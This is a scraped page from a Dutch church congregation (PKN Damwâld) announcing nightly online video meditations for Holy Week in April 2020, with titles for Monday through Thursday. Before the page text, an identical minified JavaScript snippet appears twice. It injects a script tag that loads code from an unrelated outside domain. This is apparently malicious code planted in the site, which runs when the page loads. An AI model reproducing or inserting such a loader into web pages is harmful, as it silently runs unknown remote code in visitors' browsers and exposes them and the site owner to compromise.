;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Overdenking voor in stille week voor pasen - PKN Damwâld
Overdenking voor in stille week voor pasen

Deze stille week lopen we samen richting Goede Vrijdag en Pasen. Elke avond zal er een film online komen. Een mini – viering waar Ds. Boukes en Robert om en om stil zullen staan bij iemand uit het verhaal. Een schriftlezing, een meditatie en wat mooie muziek om samen deze week te beleven. Als het niet in het kerkgebouw kan dan komen we naar u toe.

#1 VolgenMaandag 6 april 2020

#2 Treur om jezelfDinsdag 7 april 2020

#3 Denk aan mijWoensdag 8 april 2020

#4 Jezus bidt voor zijn vijandenDonderdag 9 april 2020